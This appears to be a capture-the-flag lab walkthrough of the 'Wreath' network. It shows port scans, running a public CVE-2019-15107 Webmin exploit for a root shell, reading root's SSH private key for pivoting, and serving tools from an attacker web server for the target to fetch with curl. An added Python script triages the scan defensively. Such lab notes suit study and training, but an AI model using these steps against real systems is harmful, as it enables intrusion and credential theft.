rustscan -a 10.200.125.200
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
443/tcp open https syn-ack
10000/tcp open snet-sensor-mgmt syn-ack
nmap -sC -sV 10.200.125.200 -p 22,80,443,10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 9c:1b:d4:b4:05:4d:88:99:ce:09:1f:c1:15:6a:d4:7e (RSA)
| 256 93:55:b4:d9:8b:70:ae:8e:95:0d:c2:b6:d2:03:89:a4 (ECDSA)
|_ 256 f0:61:5a:55:34:9b:b7:b8:3a:46:ca:7d:9f:dc:fa:12 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_http-title: Did not follow redirect to <https://thomaswreath.thm>
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_http-title: Thomas Wreath | Developer
| ssl-cert: Subject: commonName=thomaswreath.thm/organizationName=Thomas Wreath Development/stateOrProvinceName=East Riding Yorkshire/countryName=GB
| Not valid before: 2022-02-08T11:28:40
|_Not valid after: 2023-02-08T11:28:40
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-server-header: MiniServ/1.890
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Because there is no DNS entry for the host, add the following line to /etc/hosts:
10.200.125.200 thomaswreath.thm
Searching Google for the version banner "MiniServ 1.890 (Webmin httpd)" leads to CVE-2019-15107,
for which a public proof of concept is available at:
https://github.com/MuirlandOracle/CVE-2019-15107
python3 CVE-2019-15107.py 10.200.125.200
After running the Python script we get a shell as the root user.
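As an added example (not part of the original notes), the following Python triages the nmap service lines from the scan above and flags what a defender would fix on this host: the Webmin build still in the CVE-2019-15107 range and the TRACE method enabled on the Apache vhost. The sample scan text is constructed from the output above; the parser and the fixed-version threshold are this example's own, not something the notes state.

```python
import re

# Constructed sample: the relevant lines from the nmap -sV scan above.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
| http-methods:
|_ Potentially risky methods: TRACE
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-server-header: MiniServ/1.890
"""

# Matches "port/proto state service version..." lines of nmap output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Webmin 1.930 shipped the fix for CVE-2019-15107, so any MiniServ
# banner below that version is treated as affected.
WEBMIN_FIXED = (1, 930)


def parse_version(banner):
    """Turn 'MiniServ 1.890 (Webmin httpd)' into (1, 890); None if absent."""
    m = re.search(r"\b(\d+)\.(\d+)\b", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def triage(scan_text):
    """Return [(port, finding)] for the issues a defender should fix."""
    findings = []
    port = None
    for line in scan_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            ver = parse_version(m.group(5))
            if "MiniServ" in m.group(5) and ver and ver < WEBMIN_FIXED:
                findings.append((port, "Webmin %d.%d is affected by "
                                 "CVE-2019-15107: upgrade to 1.930+ and keep "
                                 "Webmin off untrusted networks" % ver))
            continue
        # NSE script lines (prefixed '|') belong to the last port seen.
        if port and line.startswith("|") and "risky" in line and "TRACE" in line:
            findings.append((port, "HTTP TRACE enabled: set TraceEnable Off"))
    return findings
```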
Then read /root/.ssh/id_rsa to obtain root's private SSH key, save it locally (here as id_rsa_priv),
and chmod 600 it so it can be used for the pivot later.
Download the static nmap binary from
Set up your own Python web server on the attacking machine:
sudo python3 -m http.server 80
Then, from the target machine, use curl to fetch the static nmap binary from our local machine.